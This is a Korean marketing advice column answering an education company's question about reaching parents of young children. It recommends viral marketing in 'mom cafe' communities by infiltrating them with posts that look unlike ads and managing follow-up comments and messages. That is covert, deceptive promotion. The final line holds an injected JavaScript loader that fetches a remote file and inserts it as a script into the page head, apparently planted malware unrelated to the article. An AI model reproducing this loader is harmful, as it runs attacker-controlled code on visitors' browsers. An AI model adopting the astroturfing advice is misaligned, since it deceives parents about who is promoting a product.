마케터들만 아는, 비밀보장 ‘찐’ 고민 상담 편지
안녕하세요~ 저희 회사는 영유아 교육 콘텐츠를 개발 중에 있는 회사입니다.
곧 상품 출시를 앞두고 있어 마케팅 계획도 슬슬 시작하고자 하는데요.
아무래도 저희 교육 콘텐츠가 영유아 교육 쪽이다 보니 자연스럽게 영유아 자녀를 둔 학부모가 저희의 타겟이 되었습니다.
이전에는 저희 회사가 성인 교육이 메인이라 영유아 쪽은 처음 시도해보는데요.
그래서 보통 학부모들은 어디에서 정보를 얻는지, 어떤 매체들을 많이 이용하는지 궁금합니다.
학부모를 타겟으로 추천하는 효과적인 마케팅 방법이 있을까요?
안녕하세요 J담당자님. 전달해 주신 고민 사연을 읽고 바로 떠올랐던 마케팅 방법이 있는데요.
바로 입소문 마케팅입니다.
바이럴 마케팅이라고 하면 조금 더 친숙하실 것 같네요:)
흔히 영유아 자녀를 둔 학부모분들은 주변 지인들의 추천, 맘카페에 올라온 내용들로 정보를 얻는 경우가 많습니다.
그렇기 때문에 입소문 마케팅을 잘 활용하면 효과적인 상품 홍보가 가능하실 것 같아요.
아래 입소문 마케팅에 대해서 조금 더 자세히 알려 드릴게요.
우선 입소문 마케팅은 크게 바이럴 마케팅, 버즈 마케팅 두가지로 나눌 수 있는데요,
두 마케팅의 공통점은 ‘입소문’이라는 방법을 통해 마케팅 한다는 점에서 공통점이 있지만 차이점도 있습니다.
◆ 바이럴 마케팅(viral marketing)이란?
바이럴 마케팅은 바이러스처럼 급속도로 전파된다는 뜻에서 생겨난 용어예요.
SNS를 통해 급속도로 퍼져나갈 수 있게끔 재미있고 유익한 메시지를 제작하는 입소문 마케팅이죠.
바이럴 마케팅은 전달 주체가 명확하고 SNS, 블로그, 카페 등의 매체를 통해 급속도로 전파되는 특징이 있는데요.
우리가 흔히 아는 ‘아이스버킷 챌린지’도 바이럴 마케팅에 속한 마케팅 사례로 볼 수 있습니다.
◆ 버즈 마케팅(buzz marketing)이란?
버즈 마케팅은 꿀벌이 윙윙 거리는 모습에서 생겨난 용어인데요.
소비자들이 자발적으로 메시지를 전달하게 하여 상품에 대한 긍정적인 입소문을 내게 하는 마케팅기법이죠.
바이럴 마케팅 보다는 전파 주체가 불명확하다는 특징이 있어요.
두 마케팅 모두 입소문에서 시작된 마케팅이기 때문에 사전적 정의로 명확하게 나눌 순 없지만
궁극적으로 기억하셔야 할 부분은 입소문 마케팅을 이용하면
저렴한 비용으로 보다 신뢰도 높은 마케팅 효과를 거둘 수 있다는 점입니다.
입소문 마케팅에 대한 개념을 간략히 알았다면,
제가 담당자님께 결과적으로 추천드리는 마케팅은 위에서 잠깐 언급했던 맘카페 바이럴 마케팅입니다.
◆맘카페 바이럴 마케팅이란?
맘카페 바이럴 마케팅이란 해당 지역 맘카페 커뮤니티에 침투하여
광고 같지 않은 자연스러운 홍보성 게시글을 배포하고 댓글, 대댓글, 쪽지 등의 후 관리까지 더해주어
이를 통해 운영 중인 서비스의 긍정적인 이미지를 완성시켜주는 마케팅입니다.
그렇기 때문에 제품의 인지도 상승은 물론 간접적인 후기성 게시글로 인해 소비자의 구매 욕구를 향상시킬 수 있습니다.
워낙 학부모들의 파워가 강해지다 보니 여러 부정적인 요소들도 나타나고 있지만
특별한 광고 없이도 맘 카페에서 소문이 나면 급격한 매출 상승으로 이어지는 경우가 상당히 많습니다.
맘 카페 바이럴 마케팅이 입소문 마케팅이라고 불리는 이유이기도 합니다.
입소문 마케팅 외에도 즉각적인 매출 상승을 위한 DB마케팅도 있는데요.
관련 내용이 궁금하시다면 아래 버튼을 통해 보다 자세한 내용 확인하실 수 있습니다:)
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)